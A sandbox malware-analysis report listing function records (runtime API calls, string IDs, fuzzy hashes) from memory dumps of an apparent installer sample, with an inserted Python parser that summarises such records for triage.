                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv$__aullrem
                                      • String ID:
                                      • API String ID: 2022606265-0
                                      • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                      • Instruction ID: 35b7e95ac0e919305c4dfc5f162d4b469f630344b19e59863b1375a429c07e79
                                      • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                      • Instruction Fuzzy Hash: 9C21C530545299FEDF208FD69C40DCF7A6DEB817A8F208226B56861990E2724D61D6A1
                                      APIs
                                      • _free.LIBCMT ref: 6CB891CD
                                      • _free.LIBCMT ref: 6CB891F6
                                      • SetEndOfFile.KERNEL32(00000000,6CB87DDC,00000000,6CB7E7C0,?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000), ref: 6CB89228
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000,?,?,?,?,00000000,?), ref: 6CB89244
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFileLast
                                      • String ID: 8Q
                                      • API String ID: 1547350101-4022487301
                                      • Opcode ID: 8b3ede3235fe81f6125da9fe0af2a22162741a8e38ef2c6d8ece84d3119231ef
                                      • Instruction ID: 8ca4fee0b774dc842ccf661783cbbd29280355d03007020b9a15bba55141e48b
                                      • Opcode Fuzzy Hash: 8b3ede3235fe81f6125da9fe0af2a22162741a8e38ef2c6d8ece84d3119231ef
                                      • Instruction Fuzzy Hash: 3F41C432D46685AADF11AFA8CC44BCE3779EF45324F150514E834A7B90DB35C8498762
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBF6853
                                        • Part of subcall function 6CBF65DF: __EH_prolog.LIBCMT ref: 6CBF65E4
                                        • Part of subcall function 6CBF6943: __EH_prolog.LIBCMT ref: 6CBF6948
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: ((K$<(K$L(K$\(K
                                      • API String ID: 3519838083-3238140439
                                      • Opcode ID: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                      • Instruction ID: a910ffd3002bcb40a6f8f7fdc5a490ca7ebc58e879106be0e7338f3e2545a9cc
                                      • Opcode Fuzzy Hash: cede27c3a22cca09b7bd7d03a45c990e4592a35e63268caaaf0da1c0b765a472
                                      • Instruction Fuzzy Hash: 6E215CB0901B90CEC724DF6AC54469FFBF4EF54304F108A5F80A687B50DBB46A08CB65
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB7282F
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CB72842
                                      • FreeLibrary.KERNEL32(00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB72865
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 7c84d91e5d512118d790869aee592ad0d9cd8193bc1caa484bb471a98e37d07a
                                      • Instruction ID: a31ef63dd1676a0adf7f1acc091bbf1e073d297ee0118ad57b1d677f5ff8149d
                                      • Opcode Fuzzy Hash: 7c84d91e5d512118d790869aee592ad0d9cd8193bc1caa484bb471a98e37d07a
                                      • Instruction Fuzzy Hash: 2EF08C30611158FBDF119F92CE0DB9EBBB8EF0236AF114074A811B2560DF718A01DBA2
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 6CB6AA1E
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6CB6AA29
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB6AA97
                                        • Part of subcall function 6CB6A920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CB6A938
                                      • std::locale::_Setgloballocale.LIBCPMT ref: 6CB6AA44
                                      • _Yarn.LIBCPMT ref: 6CB6AA5A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                      • String ID:
                                      • API String ID: 1088826258-0
                                      • Opcode ID: b7eed6536ca92216f242936b1f857e17eab6c2585158e7fd31753119f895b775
                                      • Instruction ID: 7f3d78da772cdcd59a9455271a1a13e32863704e261f74f9903197f94ea76c16
                                      • Opcode Fuzzy Hash: b7eed6536ca92216f242936b1f857e17eab6c2585158e7fd31753119f895b775
                                      • Instruction Fuzzy Hash: B1015679A012A19FDF06DF22CA50ABD7BB1FB85354B190449D9125BB80CF34AA06EF81
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $!$@
                                      • API String ID: 3519838083-2517134481
                                      • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                      • Instruction ID: 71301c6d1b29353031536ecee6d17e3ed433f46569adc3af8539dbd6d94bf667
                                      • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                      • Instruction Fuzzy Hash: 52126734D05289DFCB04CFA4C490ADEBBB9FF09B88F148069E445ABB51DB35A949CF61
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog__aulldiv
                                      • String ID: $SJ
                                      • API String ID: 4125985754-3948962906
                                      • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                      • Instruction ID: da0286960010855e3ec5b3432eeedc84bde798e14d14d48fce72b8e3271bcb39
                                      • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                      • Instruction Fuzzy Hash: CBB14FB1D002599FCB14CF95C8809AEBBB5FF48314F60862ED459B7B50DB30AA49CF56
                                      APIs
                                        • Part of subcall function 6CB6AA17: __EH_prolog3.LIBCMT ref: 6CB6AA1E
                                        • Part of subcall function 6CB6AA17: std::_Lockit::_Lockit.LIBCPMT ref: 6CB6AA29
                                        • Part of subcall function 6CB6AA17: std::locale::_Setgloballocale.LIBCPMT ref: 6CB6AA44
                                        • Part of subcall function 6CB6AA17: _Yarn.LIBCPMT ref: 6CB6AA5A
                                        • Part of subcall function 6CB6AA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB6AA97
                                        • Part of subcall function 6CA32F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CA32F95
                                        • Part of subcall function 6CA32F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CA32FAF
                                        • Part of subcall function 6CA32F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA32FD0
                                        • Part of subcall function 6CA32F60: __Getctype.LIBCPMT ref: 6CA33084
                                        • Part of subcall function 6CA32F60: std::_Facet_Register.LIBCPMT ref: 6CA3309C
                                        • Part of subcall function 6CA32F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA330B7
                                      • std::ios_base::_Addstd.LIBCPMT ref: 6CA3211B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 3332196525-1866435925
                                      • Opcode ID: d13fbe435e0703590b8d411efafcc916c5df1f4c80f498221998c8d143cbbb07
                                      • Instruction ID: c8f56a7e5e1cd912faee63e36c495b585bf095270e2cceeb165f370b15660adc
                                      • Opcode Fuzzy Hash: d13fbe435e0703590b8d411efafcc916c5df1f4c80f498221998c8d143cbbb07
                                      • Instruction Fuzzy Hash: 4141CFB0A003498FEB00CF64D8457AEBBB0FF49314F149268E919AB781E7759985CFD0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 0$LrJ$x
                                      • API String ID: 3519838083-658305261
                                      • Opcode ID: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                      • Instruction ID: 8669de3080e4c4a3c0c189618332f105490436c8690984c53140be041735642f
                                      • Opcode Fuzzy Hash: 95611479d40a215ec944db407e0a8f4bd880271165c87792ba86edb23d6a866c
                                      • Instruction Fuzzy Hash: 73216D36D011999BCF04DBD8D990AEEB7B5EF99308F20006AE41177640DB756E08CBA1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBC7ECC
                                        • Part of subcall function 6CBB258A: __EH_prolog.LIBCMT ref: 6CBB258F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: :hJ$dJ$xJ
                                      • API String ID: 3519838083-2437443688
                                      • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                      • Instruction ID: 2656c62251e04bca91c51505a725d052b9e5df1d052105817932400e9979e9ed
                                      • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                      • Instruction Fuzzy Hash: 4521A9B0805B40CFC760CF6AC14429ABBF4BF2A718B50896EC0AA97B11D7B4A509CF55
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CB7E7C0,6CA31DEA,00008000,6CB7E7C0,?,?,?,6CB7E36F,6CB7E7C0,?,00000000,6CA31DEA), ref: 6CB7E4B9
                                      • GetLastError.KERNEL32(?,?,?,6CB7E36F,6CB7E7C0,?,00000000,6CA31DEA,?,6CB87D8E,6CB7E7C0,000000FF,000000FF,00000002,00008000,6CB7E7C0), ref: 6CB7E4C3
                                      • __dosmaperr.LIBCMT ref: 6CB7E4CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 2336955059-4022487301
                                      • Opcode ID: c666ebe9511f0637cc5edfd34ac3bf2e84c8a8abaef3d70a82c2938b6de717c1
                                      • Instruction ID: 0459e6d85252536658399a477833c164e68f005389ca1d359c3e1776c1024f1a
                                      • Opcode Fuzzy Hash: c666ebe9511f0637cc5edfd34ac3bf2e84c8a8abaef3d70a82c2938b6de717c1
                                      • Instruction Fuzzy Hash: BF01B532714595AFCB159F6ACC448DD3B7DEF863347240208ED21AB680EA71D9518BA1
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE61BA
                                        • Part of subcall function 6CBE6269: __EH_prolog.LIBCMT ref: 6CBE626E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J$DJ
                                      • API String ID: 3519838083-3152824450
                                      • Opcode ID: ae61c101c46c5c8fb0edf6ab07ecac335665618d15e9b15e4cd2ad5cdca4aa88
                                      • Instruction ID: 0db4d46cb3d7c90fa3dc936aefa3a49f98329fc634468c095ea1f0b1cedc3bbc
                                      • Opcode Fuzzy Hash: ae61c101c46c5c8fb0edf6ab07ecac335665618d15e9b15e4cd2ad5cdca4aa88
                                      • Instruction Fuzzy Hash: 6911D4B1901794CFC720CF6AC4986DAFBF0FB29304F54C86E90AA87711D7B4A508CB65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: <J$DJ$HJ$TJ$]
                                      • API String ID: 0-686860805
                                      • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                      • Instruction ID: 17359947321acedc0713615700410794b4764b7e5fd1c83321913ab4e0fcf0b0
                                      • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                      • Instruction Fuzzy Hash: 26419170C052D9AFCF54DBA1D4908FEB770EF11308B6085A9E06277A60EF35E649CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,3K$,3K@3KP3K$@3K$P3K$p3K
                                      • API String ID: 0-3393562052
                                      • Opcode ID: 56e76445033a99da05fe192590a15bb20ec13d4a39ad9bab330bef12182d4e5a
                                      • Instruction ID: 62134017a4ccf182498dcb7e31b0b0a71dca241698a5cc45037e658ab5189086
                                      • Opcode Fuzzy Hash: 56e76445033a99da05fe192590a15bb20ec13d4a39ad9bab330bef12182d4e5a
                                      • Instruction Fuzzy Hash: BF2117B1580B419FC320CF5AC48978BFBF4FB15755F50DA2ED5AA57A40C7B8A208CB98
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,6CB72654,6CB99DD0,0000000C), ref: 6CB780A7
                                      • _free.LIBCMT ref: 6CB78104
                                      • _free.LIBCMT ref: 6CB7813A
                                      • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6CB72654,6CB99DD0,0000000C), ref: 6CB78145
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast_free
                                      • String ID:
                                      • API String ID: 2283115069-0
                                      • Opcode ID: bc82d5b00d43222111ef46a28fe42f0063a0941ecb68f926633aa3ea8dd2172e
                                      • Instruction ID: 8d077176ab13e67c921ce8112e647bf61c0d586adf5cf7b69bca133c14a64670
                                      • Opcode Fuzzy Hash: bc82d5b00d43222111ef46a28fe42f0063a0941ecb68f926633aa3ea8dd2172e
                                      • Instruction Fuzzy Hash: 36119172345581AA9A711A769C84DAE267AEBC737CB25062AFD34F2FC0DB72CC054731
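Nearly every record in this listing resolves to MSVC runtime code rather than to the dropper's own logic: `__EH_prolog`, `std::_Lockit`, `_free`/`__dosmaperr`, and even the `GetModuleHandleExW("mscoree.dll")` + `GetProcAddress("CorExitProcess")` pair, which is the CRT's managed-exit probe. When triaging a report like this one, the first question is which records call a real DLL export at all, and from which memory dump. The parser below is an added example, not part of the Joe Sandbox report or its IDA plugin; the record layout (bullet "Name.MODULE(args), ref: ADDR" API lines, a "Source File" line, "API ID"/"String ID" fields, and an "Instruction Fuzzy Hash" line closing each record) is inferred from the lines above, the names `parse_records`, `summarize` and `FunctionRecord` are mine, and `SAMPLE` is constructed from four of this page's records with the Associated-dump lines dropped.

```python
"""Parse Joe Sandbox IDA-plugin function records into a triage summary.

Added example, not Joe Sandbox code. Record layout is inferred from the report:
API lines "Name.MODULE(args), ref: ADDR", a "Source File" line, "API ID" /
"String ID" fields, and an "Instruction Fuzzy Hash" line that ends each record.
"""
import re
from dataclasses import dataclass, field

# Static CRT/STL libraries the plugin names instead of a DLL: runtime, not payload logic.
LIBRARY_MODULES = {"LIBCMT", "LIBCPMT"}

API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (name, module, ref, via_subcall)
    fields: dict = field(default_factory=dict)  # "Source File", "API ID", "String ID", ...

    @property
    def source_dump(self):
        # "<dump>.sdmp, Offset: 6C9E0000, based on PE: true" -> just the dump name
        return self.fields.get("Source File", "").split(",")[0]

    def win32_apis(self):
        """Direct calls (not inherited from a subcall) that resolve to a DLL, not the CRT."""
        return sorted({n for n, m, _, sub in self.apis
                       if m.upper() not in LIBRARY_MODULES and not sub})

    def is_library_only(self):
        """True when every reference is CRT/STL: almost always compiler runtime."""
        return bool(self.apis) and all(m.upper() in LIBRARY_MODULES for _, m, _, _ in self.apis)


def parse_records(text):
    """Split a listing into FunctionRecord objects, one per Instruction Fuzzy Hash line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["ref"], m["caller"] is not None))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key = m["key"].strip()
            cur.fields[key] = m["value"].strip()
            if key == "Instruction Fuzzy Hash":  # closes the record
                records.append(cur)
                cur = FunctionRecord()
    return records


def summarize(records):
    """What a triager wants first: DLL APIs used, the dump each came from, and the strings."""
    apis = {}
    for r in records:
        for name in r.win32_apis():
            apis.setdefault(name, set()).add(r.source_dump)
    return {
        "records": len(records),
        "library_only": sum(r.is_library_only() for r in records),
        "win32_apis": {k: sorted(v) for k, v in sorted(apis.items())},
        "strings": sorted({r.fields.get("String ID", "") for r in records} - {""}),
    }


# Constructed sample: four records copied from this report, Associated lines dropped.
SAMPLE = r"""
APIs
• _free.LIBCMT ref: 6CB891CD
• _free.LIBCMT ref: 6CB891F6
• SetEndOfFile.KERNEL32(00000000,6CB87DDC,00000000,6CB7E7C0,?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000), ref: 6CB89228
• GetLastError.KERNEL32(?,?,?,?,?,?,?,6CB87DDC,6CB7E7C0,00000000,?,?,?,?,00000000,?), ref: 6CB89244
• Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
• API ID: _free$ErrorFileLast
• String ID: 8Q
• Instruction Fuzzy Hash: 3F41C432D46685AADF11AFA8CC44BCE3779EF45324F150514E834A7B90DB35C8498762
APIs
• Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
• API ID: __aulldiv$__aullrem
• String ID:
• Instruction Fuzzy Hash: 9C21C530545299FEDF208FD69C40DCF7A6DEB817A8F208226B56861990E2724D61D6A1
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB7282F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CB72842
• FreeLibrary.KERNEL32(00000000,?,?,6CB728A4,?,?,6CB72925,?,?,?), ref: 6CB72865
• Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 2EF08C30611158FBDF119F92CE0DB9EBBB8EF0236AF114074A811B2560DF718A01DBA2
APIs
• __EH_prolog.LIBCMT ref: 6CBF6853
  • Part of subcall function 6CBF65DF: __EH_prolog.LIBCMT ref: 6CBF65E4
• Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
• API ID: H_prolog
• String ID: ((K$<(K$L(K$\(K
• Instruction Fuzzy Hash: 6E215CB0901B90CEC724DF6AC54469FFBF4EF54304F108A5F80A687B50DBB46A08CB65
"""
```

`summarize(parse_records(SAMPLE))` reports one library-only record (the `__EH_prolog` one) and five KERNEL32 exports, all from the 6C9E1000 dump. Subcall-inherited references are kept on the record (so `CloseHandle` reached through `___initconout` is not lost) but excluded from `win32_apis()` so that the same call is not counted once per caller. Records whose API list was collapsed in the report, like the `__aulldiv$__aullrem` one, keep their `API ID` and `String ID` fields but classify as neither library-only nor Win32-calling; treat those as unknown rather than benign.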
                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,?,6CB87DDC,00000000,00000000,?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0), ref: 6CB895C1
                                      • GetLastError.KERNEL32(?,6CB88241,00000000,00000001,00000000,6CB7E7C0,?,6CB7F976,?,?,6CB7E7C0,?,6CB7E7C0,?,6CB7F40C,6CB891A6), ref: 6CB895CD
